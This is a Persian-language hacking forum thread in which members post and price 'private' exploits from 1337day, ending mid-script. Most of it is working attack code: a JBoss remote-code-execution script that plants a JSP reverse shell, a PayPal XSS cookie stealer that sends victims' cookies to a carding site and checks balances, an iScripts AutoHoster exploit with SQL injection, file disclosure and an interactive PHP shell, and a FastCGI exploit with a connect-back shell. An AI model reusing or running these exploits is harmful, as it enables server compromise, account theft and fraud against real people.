انجمن تیم امنیتی ایران سایبر

Private Exploits In 1337day

شروع موضوع توسط WH!T3 W01F ‏28/1/15 در انجمن Vulnerability Laboratory

  1. لطفا فایل های خود را جهت ماندگاری در انجمن اپلود کنید در صورت مشاهده لینک اپلود خروجی , تاپیک حذف خواهد شد .
    بستن اطلاعیه
بستن اطلاعیه


درود مهمان گرامي؛

مهمان گرامي، براي مشاهده تالار با امکانات کامل ميبايست از طريق ايــن ليـــنک ثبت نام کنيد .

حامی مسابقات و برگزار کننده دوره های پیشرفته ارزیابی امنیت برای سازمان ها فتح پرچم (CTF)
  1. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    اینجا من اکسپلویت های Priv8 و پولی سایت اینجکتور رو اونایی رو که دارم میذارم دوستان هم اگر مایل بودند قرار دهند.

    دوستان مثل اینکه این اکسپلویت ها تا حدودی پابلیک شدند و من هم خبر نداشتم چون انهارو من خیلی وقت پیش داشتم.

    اگر کسی میخواد پابلیک بکنه بکنه ولی با ذکر منبع.
     
  2. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    ClipBucket 2.6 Multi Exploits(Arbitrary File Uploader and XSS)

    ClipBucket 2.6 Multi Exploits(Arbitrary File Uploader and XSS)

    20$

    PHP:
    Information
    --------------------
    Name :  XSS Vulnerabilities in ClipBucket
    Software 
    :  ClipBucket 2.6 and possibly below.
    Vendor Homepage :  http://clip-bucket.com
    Vulnerability Type :  Cross-Site Scripting
    Severity 
    :  Critical
    Researcher 
    :  Canberk Bolat
    Advisory Reference 
    :  NS-12-013

    Description
    --------------------
    ClipBucket is an OpenSource Multimedia Management Script Provided Free
    to the Community
    This script comes with all the bells whistles
    required to start your own Video Sharing website like Youtube
    ,
    MetacafeVeohHulu or any other top video distribution application
    in matter of minutes
    ClipBucket is fastest growing script which was
    first started 
    as Youtube Clone but now its advance features &
    enhancements makes it the most versatilereliable scalable media
    distribution platform with latest social networking features
    , while
    staying light on your pocketsWhether you are a small fan club or a
    big Multi Tier Network operator
    Clipbucket will fulfill your video
    management needs
    .

    Details
    --------------------
    ClipBucket is affected by XSS vulnerabilities in version 2.6

    Params
    : (catsorttimeseo_cat_namecatsorttimepageseo_cat_name)
    Files: (channels.phpcollections.phpgroups.phpphotos.phpvideos.php)
    http://example.com/search_result.php?query=3&type='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x005B39)%3C/script%3E&submit=Search

    signup.php (POSTusername)
    You can read the full article about Cross-Site Scripting from here:

    Cross-site Scripting (XSS)
    Solution
    --------------------
    No fix.

    Advisory Timeline
    --------------------
    05/12/2011 First Contact
    03
    /01/2012 Second Contact No Reply
    19
    /10/2012 Advisory Released

    Credits
    --------------------
    It has been discovered on testing of NetsparkerWeb Application
    Security Scanner 
    http://www.mavitunasecurity.com/netsparker/.

    References
    --------------------
    Vendor Url Patch : -
    MSL Advisory Link :
    http://www.mavitunasecurity.com/xss-vulnerabilities-in-clipbucket/
    Netsparker Advisories http://www.mavitunasecurity.com/netsparker-advisories/

    About Netsparker
    --------------------
    Netsparker® can find and report security issues such as SQL Injection
    and Cross-site Scripting (XSSin all web applications regardless of
    the platform 
    and the technology they are built onNetsparker's unique
    detection and exploitation techniques allows it to be dead accurate in
    reporting hence it'
    s the first and the only False Positive Free web
    application security scanner
    .
     
  3. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    f*ac*ebook Privacy Vulnerability Create Private Messages from Anyone

    700$

    پیوست شد.

    پسورد : iran-cyber.org
     

    پیوست ها:

  4. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    Jboss Application Server Remote Code Execution 0day

    500$

    PHP:
    #JBoss AS Remote Exploit
      #by Kingcope
      #####
      use IO::Socket;
      use LWP::UserAgent;
      use URI::Escape;
      use MIME::Base64;
      sub usage {print “JBoss AS Remote Exploit
      by Kingcope
      usage
    perl jboss.pl
    ;print “exampleperl daytona.pl192.168.2.10 8080 192.168.2.2 443 lnx
    ;
      exit;
    }
      if ($#ARGV != 4) { usage; }
      $host $ARGV[0];
      $port $ARGV[1];
      $myip $ARGV[2];
      $myport $ARGV[3];
      $com $ARGV[4];
      if ($com eq “lnx”) {
      $comspec /bin/sh”;
    }
      if ($com eq “win”) {
      $comspec “cmd.exe”;
    }
      $|=1;
      $jsp=
    <%@page import="java.lang.*, java.util.*, java.io.*, java.net.*"
    %>
    <%!
      static class StreamConnectorextends Thread
    {
      InputStream is;
      OutputStream os;
      StreamConnectorInputStream isOutputStream os)
    {
      this.is is;
      this.os os;
    }
      public void run()
    {
      BufferedReader in null;
      BufferedWriter out null;
    try
    {
      in = new BufferedReader( new InputStreamReaderthis.is ) );
      out = new BufferedWriter( new OutputStreamWriterthis.os ) );
      char buffer[] = new char[8192];
      int length;
      while( ( length in.readbuffer0buffer.length ) ) > )
    {
      out.writebuffer0length );
      out.flush();
    }
      } catch( Exception e ){}
    try
    {
      ifin != null )
      in.close();
      ifout != null )
      out.close();
      } catch( Exception e ){}
    }
    }
    %>
    <%
    try
    {
      Socket socket = new Socket"$myip"$myport );
      Process process Runtime.getRuntime().exec"$comspec);
      ( new StreamConnectorprocess.getInputStream(), socket.getOutputStream() ) ).start();
      ( new StreamConnectorsocket.getInputStream(), process.getOutputStream() ) ).start();
      } catch( Exception e ) {}
      %>;
      #print $jsp;exit;
      srand(time());
      sub randstr
    {
      my $length_of_randomstring=shift;# the length of# the random string to generate
      my @chars=(’’a’’..’’z’’,’’A’’..’’Z’’,’’0’’..’’9’’,’’_’’);
      my $random_string;
      foreach (1..$length_of_randomstring)
    {
    # rand @chars will generate arandom# number between 0 and scalar @chars
      $random_string.=$chars[rand @chars];
    }
      return $random_string;
    }
      $appbase randstr(8);
      $jspname randstr(8);
      print “APPBASE=$appbase
      JSPNAME
    =$jspname
    ;
      $bsh_script =
      qq{import java.io.FileOutputStream;import sun.misc.BASE64Decoder;String val } . encode_base64($jsp“”) . qq{;BASE64Decoder decoder newBASE64Decoder();
      String jboss_home System.getProperty(“jboss.server.home.dir”);
      new File(jboss_home /deploy/} . $appbase .war” qq{).mkdir();
      byte[] byteval decoder.decodeBuffer(val);String jsp_file jboss_home /deploy/} . $appbase .war/” $jspname .jsp” qq{;FileOutputStream fstream newFileOutputStream(jsp_file);
      fstream.write(byteval);
      fstream.close(); };
    #
      # UPLOAD
    #
      $params ’’action=invokeOpByName&name=jboss.deployer:service=BSHDeployer&methodName=createScriptDeployment&argType=java.lang.String&arg0=’’ uri_escape($bsh_script)
    .
      ’’&argType=java.lang.String&arg1=’’ randstr(8) . ’’.bsh’’;
      my $ua LWP::UserAgent->new;
      $ua->agent(“Mozilla/5.0 (WindowsU;Windows NT 6.1en-USAppleWebKit/534.13 (KHTMLlike GeckoChrome/9.0.597.98Safari/534.13″);
      my $req HTTP::Request->new(POST => ” http://$host:$port/jmx-console/HtmlAdaptor “);
      $req->content_type(’’application/x-www-form-urlencoded’’);
      $req->content($params);
      print “UPLOAD… “;
      my $res $ua->request($req);
      if ($res->is_success) {
      print “SUCCESS
    ;
      print “EXECUTE”;
      sleep(5);
      $uri ’’/’’ $appbase ’’/’’ $jspname ’’.jsp’’;
      for ($k=0;$k<10;$k++) {
      my $ua LWP::UserAgent->new;
      $ua->agent(“Mozilla/5.0 (WindowsU;Windows NT 6.1en-USAppleWebKit/534.13 (KHTMLlike GeckoChrome/9.0.597.98Safari/534.13″);
      my $req HTTP::Request->new(GET => ” http://$host:$port$uri “);
      my $res $ua->request($req);
      if ($res->is_success) {
      print ”
      SUCCESS
    ;
      exit;
      } else {
      print “.;
      # print $res->status_line.”
    ;
      sleep(5);
    }
    }
      print “UNSUCCESSFUL
    ;
    }
      else {
      print “UNSUCCESSFUL
    ;
      print $res->status_line
    ;
      exit;
    }
     
  5. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    PayPal XSS + Cookie Stealer Exploit

    PayPal XSS + Cookie Stealer Exploit

    2800$

    PHP:
     <?php
    /*
    Website: http://carderx.com
    PayPal Exploit (XSS)
    Coded by: mainl00p
    Type: Private <No leech. *** you! *** m1nu3t and all his band _|_!>
    (O)
    <M
    o <M PayPal Blow Up! Cross Site Scripting (The SWORD TEAM)
    /| ...... /:M\------------------------------------------------,,,,,,
    (O)[]XXXXXX[]I:K+}=====<{H}>================================------------>
    \| ^^^^^^ \:W/------------------------------------------------''''''
    o <W mainl00p
    <W http://carderx.com
    (O)
    */

    define("PPLOGIN_URL""https://www.paypal.com/en");
    define("PPXSS_URL""https://www.paypal.com/it/cgi-bin/webscr?cmd=_shop-search-ext&search_cat_name=%22/%3E%27&q=%22&search_cat=&region=%22%3E%3Ciframe%20 onload=alert(0)/%3E");
    define("COOKIE_FILE""carderX.txt"); // A COOKIE FILE (WHERE TO STORE THE COOKIES)
    define("EXPLOIT_URL""http://carderx.com/temp/exploit.php"); // HERE YOU NEED TO PUT YOUR GRABBER'S URL

    // I put automatically those fields (_t must be there, it can have random value, I preferred NULL)
    function doXSS($Vector) {
    echo 
    "<form id=\"sui_m\" name=\"sui_m\" method=\"post\" class=\"\" action=\"" PPXSS_URL "\">
    <input type=\"hidden\" name=\"_t\" value=\"\"/>
    <input type=\"hidden\" name=\"_fl\" value=\"1\" />
    <input type=\"hidden\" name=\"atoi\" value=\"0\" />
    <input type=\"hidden\" name=\"min\" value=\"0\" />
    <input type=\"hidden\" name=\"max[0]\" value=\"\" />
    <input type=\"hidden\" name=\"load\" value=\"
    $Vector\" />
    </form>
    <script type=\"text/javascript\">document.getElementById(\"sui_m\").su bmit();</script>"
    ;
    }

    // Gets the cookie from GET parameter returned by XSS and stores it in file
    function getCookie() {
    if (isset(
    $_GET["c"])) {
    $f fopen(COOKIE_FILE"a");
    $c base64_encode($_GET["c"]);
    fwrite($f$c "\n");
    fclose($f);
    }
    }

    // Reads the cookie from file
    function readCookies() {
    $c file_get_contents(COOKIE_FILE);
    return 
    explode("\n"$c);
    }

    // Logs in and checks the ballance
    function check($Cookie) {
    $ch curl_init();
    curl_setopt($chCURLOPT_URLPPLOGIN_URL);
    curl_setopt($chCURLOPT_FOLLOWLOCATION1);
    curl_setopt($chCURLOPT_SSL_VERIFYPEER1);
    curl_setopt($chCURLOPT_RETURNTRANSFER1);
    curl_setopt($chCURLOPT_COOKIE$Cookie);
    $s curl_exec($ch);
    if (
    preg_match("/Ballance: (.*)\<\/b\>/i"$s$z))
    return 
    $z[1];
    return 
    NULL;
    }


    // MAIN
    if (isset($_GET["admin"]) && $_GET["admin"] == "true") {
    $ck readCookies();
    echo 
    "<table style=\"font-size: 12px;\">\n";
    echo 
    "<tr style=\"background-color: red; color: white;\"><td style=\"width: 50px;\"><b>Id</b></td><td style=\"width: 700px;\"><b>Cookie</b></td><td><b>Check</b></td></tr>\n";
    $i 0;
    foreach (
    $ck as $c) {
    echo 
    "<tr style=\"background-color: grey;\"><td>" . ++$i "</td><td>$c</td><td><a href=\"?check=" base64_encode($c) . "\">Check</a></td></tr>\n";
    }
    die(
    "");
    }

    if (isset(
    $_GET["check"]) && $_GET["check"] != "") {
    $cz check(check($_GET["check"]));
    if (
    $cz != NULL)
    echo 
    "Ballance: " $cz;
    else
    echo 
    "Error logging in!";
    die(
    "");
    }

    $XSS "\"><script>window.location=" EXPLOIT_URL "?c=" "\" + document.cookie;</script>";
    doXSS($XSS);
    ?> 
     
  6. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    Yahoo! Referer Header XSS Vulnerability

    Yahoo! Referer Header XSS Vulnerability

    20$

    PHP:
    Connectionkeep-alive Header is Not Being Sent During HttpWebRequest
    HttpWebRequest logIn6 
    = (HttpWebRequest)WebRequest.Create(new Uri(responseFromLogIn5));
    logIn6.CookieContainer cookies;
    logIn6.KeepAlive true;
    logIn6.Referer "https://login.yahoo.com/config/login?.src=spt&.intl=us&.lang=en-US&.done=http://football.fantasysports.yahoo.com/";
    logIn6.UserAgent "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1";
    logIn6.Accept "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
    logIn6.Headers.Add("Accept-Encoding:gzip,deflate,sdch");
    logIn6.Headers.Add("Accept-Language:en-US,en;q=0.8");
    logIn6.Headers.Add("Accept-Charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3");
    logIn6.AllowAutoRedirect false;

    HttpWebResponse logIn6Response = (HttpWebResponse)logIn6.GetResponse();
    string responseFromLogIn6 logIn6Response.GetResponseHeader("Location");

    cookies.Add(logIn6Response.Cookies);

    logIn6Response.Close();
     
       
    GET xxx HTTP
    /1.1
    Host
    accounts.google.com
    Connection
    keep-alive
    Referer
    https://login.yahoo.com/config/login?.src=spt&.intl=us&.lang=en-US&.done=http://football.fantasysports.yahoo.com/
    User-AgentMozilla/5.0 (Windows NT 6.1WOW64AppleWebKit/535.1 (KHTMLlike GeckoChrome/13.0.782.220 Safari/535.1
    Accept
    text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-US,en;q=0.8
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
    Cookie: xxx

    HTTP/1.1 302 Moved Temporarily
    Set-Cookie: xxx
    Set-Cookie: xxx
    Location: xxx
    Content-Type: text/html; charset=UTF-8
    P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
    Date: Sat, 17 Sep 2011 22:27:09 GMT
    Expires: Sat, 17 Sep 2011 22:27:09 GMT
    Cache-Control: private, max-age=0
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    X-XSS-Protection: 1; mode=block
    Content-Length: 2176
    Server: GSE
        
    GET xxx HTTP/1.1
    Referer: https://login.yahoo.com/config/login?.src=spt&.intl=us&.lang=en-US&.done=http://football.fantasysports.yahoo.com/
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/
    *;q=0.8
    Accept
    -Encodinggzip,deflate,sdch
    Accept
    -Languageen-US,en;q=0.8
    Accept
    -CharsetISO-8859-1,utf-8;q=0.7,*;q=0.3
    Host
    accounts.google.com

    HTTP
    /1.1 302 Moved Temporarily
    Location
    xxx
    Content
    -Typetext/htmlcharset=UTF-8
    Date
    Sun18 Sep 2011 00:05:40 GMT
    Expires
    Sun18 Sep 2011 00:05:40 GMT
    Cache
    -Control: private, max-age=0
    X
    -Content-Type-Optionsnosniff
    X
    -Frame-OptionsSAMEORIGIN
    X
    -XSS-Protection1mode=block
    Content
    -Length573
    Server
    GSE
        
    var req = (HttpWebRequest)WebRequest.Create(someUrl);

    var 
    sp req.ServicePoint;
    var 
    prop sp.GetType().GetProperty("HttpBehaviour"BindingFlags.Instance BindingFlags.NonPublic);
    prop.SetValue(sp, (byte)0null);

    req.GetResponse().Close();
     
       
    Connection
    Keep-Alive
     
  7. R3DM0V3
    کاربرتازه وارد

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏26/12/14
    ارسال ها:
    81
    تشکر شده:
    21
    1- دوست عزیز خودت داری این اکسپلویت ها رو پابلیک میکنی
    2-

    Iscripts-AutoHoster Multiple Vulnerabilities

    لینک خرید اکسپلویت : http://1337day.com/exploit/description/21592

    قیمت : 50 Gold

    اکسپلویت :

    PHP:
     <?php
    /*
    [+] iScripts AutoHoster
    [+] Multiple vulnerabilities , PHP Code injection Exploit
    [+] Author : i-Hmx
    [+] [email protected]
    [+] sec4ever.com , 1337s.cc


    I.Sql Injection Vuln

    /checktransferstatus.php
    Table name : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select distinct concat(0x7e,0x27,unhex(Hex(cast(table_name as char))),0x27,0x7e) from information_schema.tables where table_schema=database()limit 53,1),0x723078 and 'faris'='1337
    Staff number : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select concat(0x3e3e,count(*),0x3c3c) from autohoster_staffs),0x723078 and 'faris'='1337
    Staff Data : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select concat(0x3e3e,unhex(Hex(cast(vPassword as char))),0x5e,unhex(Hex(cast(vLogin as char))),0x5e,unhex(Hex(cast(vMail as char))),0x3c3c) from autohoster_staffs limit 0,1) ,0x723078 and 'faris'='1337

    /checktransferstatusbck.php
    The same 

    II.Time based Blind Injection
    /additionalsettings.php
    Post : submit=faris&cmbdomain=%Inject_Here%

    /payinvoiceothers.php
    invno=%Inject_Here%

    Little note : Both might not work if magic_quotes_gps = on 
    Dissapointed????
    Nop , don't be so dramatic 
    am here to show u the full movie 
    not just the sad part 
    Just keep reading

    III.Local File Disclosure
    /websitebuilder/showtemplateimage.php
    include_once "includes/session.php";
    include_once "includes/function.php";
    $templateid        = $_GET['tmpid'];
    $type            = $_GET['type'];
    if ($type == "home") {
      $imagename    = "homepageimage.jpg";
    } else if($type == "sub") {
      $imagename    = "subpageimage.jpg";
    } else {
      $imagename    = "thumpnail.jpg";
    }
    readfile("./".$_SESSION["session_template_dir"]."/".$templateid."/$imagename");
    Hmmm , we can cancel the imagename value via the null byte %00
    [+] Exploit : /websitebuilder/showtemplateimage.php?tmpid=../../includes/config.php%00&type=sub

    /admin/downloadfile.php > probably injected by the Guy who nulled the script (thank u any way ;p)
    $filename    = urldecode($_GET['fname']);
    header("content-disposition:attachment;filename=$filename");
    readfile($filename)
    no need to cancel any thing , just beat it bro 
    [+] Exploit : /admin/downloadfile.php?fname=../includes/config.php

    /support/admin/csvdownload.php
      $filename="../csvfiles/".addslashes($_GET["id"]).".txt";
      header('Content-Description: File Transfer'); 
      header('Content-Type: application/force-download'); 
      header('Content-Length: ' . filesize($filename)); 
      header('Content-Disposition: attachment; filename=' . basename($filename)); 
      readfile($filename);
    [+] Exploit : /support/admin/csvdownload.php?id=../../includes/config.php%00

    IV.Directory tr. vuln
    /support/parser/main_smtp.php
    ^
    Just light sandwitch before the fatty food :))


    V.PHP Code Injection Vuln.
    Here come the King :D

    /setup/TLDSetup.php
        $tldselected = $HTTP_POST_VARS[ "tldselect" ];

        $tldcount = count ($tldselected);
        for ($j = 0; $j < $tldcount; $j++)
        {
                $tldList .= "<option <?php if ( \$cTld==\"" . $tldselected[$j] . "\" ) { echo \"selected\"; } ?>>" . $tldselected[$j] . "</option>\n";
                $tldHoldList .= "\$" . str_replace(".", "", $tldselected[$j]) . "= 1;\n";
        }

        //set up TLD list
        
        if ($HTTP_POST_VARS[ "tldsetup" ] == 1 or $HTTP_POST_VARS[ "original" ] == 1) {        
            $tldfile = fopen("./tldListOne.php", "w");
            fwrite($tldfile, "<select name=\"tld\">\n" . $tldList . "</select>");
            fclose($tldfile);        
            $tldHoldfile = fopen("./tldHoldList.php", "w");
            fwrite($tldHoldfile, "<?php\n" . $tldHoldList . "?>");
            fclose($tldHoldfile);
        }    
    oOps , what should we do yar?
     so simple 
     just post these parameters to /setup/TLDSetup.php
     tldsetup=1&tldselect[]=faris"){eval(base64_decode($_REQUEST[fa]));}elseif ($cTld=="lame&x=49&y=13
     Damn simple 
     now just go to 
     /setup/tldListOne.php
     Enter ur base64 php code as value for the parameter fa
     Example 
     post parameter : fa=cGhwaW5mbygpOw==
     this will eval phpinfo(); , u can replace it by fopening ur own php file
     It's working , But magic_quotes_gpc will fu#* it up 
     Need cleaner file???
     then post these parameters at : /setup/TLDSetup.php
     Post : tldsetup=1&tldselect[]=faris=1337;eval(base64_decode($_REQUEST[fa]));$junk&x=49&y=13
     Now ur eval code can be executed at /setup/tldHoldList.php
     That's much better , huh?
     No quotes , let magic_quotes_gpc suffer 



    /websitebuilder/createcustom.php
    if ($_POST["btnSubmit"] == "Create Custom Form") {
        $message = "";
        $txtEmailAddress = $_POST["txtEmailAddress"];//the form will be mailed to this email address on submission
        $txtPageName = $_POST["txtPageName"];//the actual page name
        $txtPageDisplayName = $_POST["txtPageDisplayName"];//for display in links
        $txtPageHeading = $_POST["txtPageHeading"];//the heading of the page
        $formelements = $_POST["formelements"];//holds the form elements to be embedded in the page

        $formstart = "<table cellspacing='2' cellpadding='2' width='100%' border='0'><tr><td align='center'>" . $txtPageHeading . "</td></tr><tr><td>";

        $formend = "</td></tr></table>";

        $formtext = $formstart . $formelements . $formend;

        if ($message != "") {
            $message = "<br>Please correct the following errors to continue!" . $message;
        } 
        if ($message == "") {//if no error, proceed with creating page, inserting to database etc
            $sql = "SELECT sm.vlinks, sm.vsub_sitelinks, tm.vlink_separator,tm.vsublink_separator,tm.vlink_type,tm.vsublink_type FROM " . $sitemaster . " sm INNER JOIN ".TABLE_PREFIX."template_mast tm ON sm.ntemplate_id = tm.ntemplate_mast ";
            $sql .= " WHERE sm." . $siteidfield . "  = '" . addslashes($siteid) . "'"; 
            // echo $sql;
            $res = mysql_query($sql);
            if (mysql_num_rows($res) != 0) {
                $row = mysql_fetch_array($res);
                $links = $row["vlinks"];
                $sublinks = $row["vsub_sitelinks"];
                $linkseparator = $row["vlink_separator"];
                $sublinkseparator = $row["vsublink_separator"];
                $linktype = $row["vlink_type"];
                $sublinktype = $row["vsublink_type"];
                $pagelink = "<a class=anchor1 href='./" . $txtPageName . "'>" . $txtPageDisplayName . "</a>";
                if ($linktype == "horizontal") {
                    $newlink = $links . $linkseparator . $pagelink;
                } else if ($linktype == "vertical") {
                    $newlink = $links . $linkseparator . $pagelink . "<br>";
                } 

                if ($sublinktype == "horizontal") {
                    $newsublink = $sublinks . $sublinkseparator . $pagelink;
                } else if ($sublinktype == "vertical") {
                    $newsublink = $sublinks . $sublinkseparator . $pagelink . "<br>";
                } 

                if ($links != "") {
                    $sql = "UPDATE " . $sitemaster . " SET vlinks = '" . addslashes($newlink) . "', vsub_sitelinks='" . addslashes($newsublink) . "' WHERE " . $siteidfield . " = '" . addslashes($siteid) . "' ";
                    mysql_query($sql);//adding links to database
                    $pagename = $txtPageDisplayName;
                    $filename = $txtPageName;
                    $pagetitle = $txtPageDisplayName;
                    $pagetype = "custom";
                    $type = "simple";

                    $sql2 = "INSERT INTO " . $sitepagetable . "(" . $siteidfield . ", vpage_name,vpage_title,vpage_type,vtype) VALUES ('" . addslashes($siteid) . "','" . addslashes($pagename) . "','" . addslashes($pagetitle) . "','" . addslashes($pagetype) . "','" . addslashes($type) . "') ";
                    mysql_query($sql2); //adding the new page to database

                    $newfilename = $sitefoldername . "/" . $filename;
                    if ($sitepagesfoldername != "") {//if it is a temp site(not completed), then create a file in the sitepages folder also
                        $newsitepagefilename = $sitepagesfoldername . "/" . $filename;
                        $fp1 = fopen($newsitepagefilename, "w+");
                        fwrite($fp1, $formtext);
                        fclose($fp1);
                    } 
     So , all we need  is valid authorized siteid 
     it's simple
     Make new site
     Go to Editing You site
       Link will be like : editsitepageoption.php?type=new&actiontype=editsite&templateid=51&tempsiteid=1
       tempsiteid=1 > that's what we need
     now time for injection 
      Go to : websitebuilder/createcustom.php
      Post parameters : siteid=1&btnSubmit=Create Custom Form&txtPageName=faris.php&formelements=<? phpinfo(); ?>
      Damn obvious , hah 
      Injected file is located at  : /websitebuilder/workarea/tempsites/1/faris.php


    Well , 
    this fool wasted me abt 80 mins  :|
    */

    print "\n+-----------------------------+\n";
    print 
    "|     iScripts AutoHoster     |\n";
    print 
    "| PHP Code injection By i-Hmx |\n";
    print 
    "|      [email protected]      |\n";
    print 
    "|   sec4ever.com , 1337s.cc   |\n";
    print 
    "+-----------------------------+\n";
    echo 
    "\n| Enter Target [http://SITE.COM/PATH/] # ";
    $target=trim(fgets(STDIN));
    function 
    kastr($string$start$end){
     
           $string " ".$string;
     
           $ini strpos($string,$start);
     
           if ($ini == 0) return "";
     
           $ini += strlen($start);
     
           $len strpos($string,$end,$ini) - $ini;
     
           return substr($string,$ini,$len);
    }
    function 
    faget($url,$post){
    $curl=curl_init();
    curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($curl,CURLOPT_URL,$url);
    curl_setopt($curlCURLOPT_POSTFIELDS,$post);
    curl_setopt($curlCURLOPT_COOKIEFILE'/'); 
    curl_setopt($curlCURLOPT_COOKIEJAR'/'); 
    curl_setopt($curlCURLOPT_SSL_VERIFYPEERfalse);
    curl_setopt($curlCURLOPT_SSL_VERIFYHOST0);
    curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);
    curl_setopt($curl,CURLOPT_TIMEOUT,20);
    curl_setopt($curlCURLOPT_HEADERfalse); 
    $exec=curl_exec($curl);
    curl_close($curl);
    return 
    $exec;
    }
    echo 
    "\n| Injecting Payload\n";
    faget($target."/setup/TLDSetup.php/",'tldsetup=1&tldselect[]=faris=1337;passthru(base64_decode($_REQUEST[fa]));$junk&x=49&y=13');

    if (!
    preg_match("/passthru()/"faget($target."/setup/tldHoldList.php""")))
    {
    die(
    "\n[-] Exploit Failed\n");
    }
    $myh=kastr($target,"//","/");
    print 
    "| sec4ever shell online\n";
    while(
    1)
    {
     
       print "\[email protected]$myh# ";
     
       $fa=trim(fgets(STDIN));
     
       if($fa=="exit")
     
       {
     
       die("\n[*] Terminating\n");
     
       }
     
       $fax=base64_encode($fa);
     
       $fadata faget($target."/setup/tldHoldList.php?fa=$fax","");
     
       print $fadata;
    }
    /*
    Msg for *** ******
    Don't sell what's not belonging to you 
    have a good day
    */
    ?>
    [*]

    3-

    f*ac*ebook Privacy Vulnerability Create Private Messages from Anyone

    لینک خرید اکسپلویت : http://1337day.com/exploit/description/20296

    قیمت : 700 Gold :24:

    برای نمایش این قسمت باید وارد سیستم شوید یا اینکه ثبت نام نمایید

    دو فایل php از لینک بالا دانلود کنید

    و اینم فیلم کار با این اکسپلویت : http://1337day.com/youtube_popup/RQuc8vnpI9Y

    حالا اگه سپاسو بدی میگم  :thankyou2:
     
  8. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    PHP 5.x + FastCGI Remote Code Execution Vulnerability

    من منظورم این بود بیشتر از این پابلیکش نکنن دیگه دست هر کسی باشه.

    PHP 5.x + FastCGI Remote Code Execution Vulnerability

    2000$

    PHP:
    #!/usr/bin/env python
    #
    # ap-unlock-v2.py - apache + PHP 5.x + FastCGI Remote Code Execution Vulnerability 0day (better version)
    #
    # NOTE:
    #   - quick'n'dirty VERY UGLYY C=000DEEE IZ N0T MY STYLE :(((
    #   - for connect back shell start netcat/nc and bind port on given host:port
    #   - is ip-range scanner not is multithreaded, but iz multithreaded iz in
    #   random scanner and is scanner from file (greets to MustLive)
    #   - no ssl support
    #   - more php paths can be added
    #   - adjust this shit for windows b0xes
    #
    # 2013
    # by noptrix - http://nullsecurity.net/

    import sys
    import socket
    import argparse
    import threading
    import time
    import random
    import select


    NONE = 0
    VULN = 1
    SCMD = 2
    XPLT = 3

    t3st = 'POST /cgi-bin/php/%63%67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D' \
            '%64+%6D%6F%64+%2D%64+%73%75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73' \
            '%3D%22%22+%2D%64+%64%6E%65+%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+' \
            '%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+'\
            '%74%5F%3D%30+%2D%64+%75%74+%2D%6E HTTP/1.1\r\nHost:localhost\r\n'\
            'Content-Type: text/html\r\nContent-Length:1\r\n\r\na\r\n'


    def m4ke_c0nn_b4ck_sh1t(cb_h0st, cb_p0rt):
        c0nn_b4ck = \
        '''
        <? set_time_limit (0); $VERSION "1.0"$ip "''' + cb_h0st + '''";
        
    $port ''' + cb_p0rt + '''$chunk_size 1400$write_a null;
        
    $error_a null$shell "unset HISTFILE; id; /bin/sh -i"$daemon 0;
        
    $debug 0; if (function_exists("pcntl_fork")) {$pid pcntl_fork();
        if (
    $pid == -1) {exit(1);}if ($pid) {exit(0);}if (posix_setsid() == -1) {
        exit(
    1);}$daemon 1;} else {print "bla";}chdir("/");umask(0);
        
    $sock fsockopen($ip$port$errno$errstr30);if (!$sock) {
        
    printit("$errstr ($errno)");exit(1);}$descriptorspec = array(
        
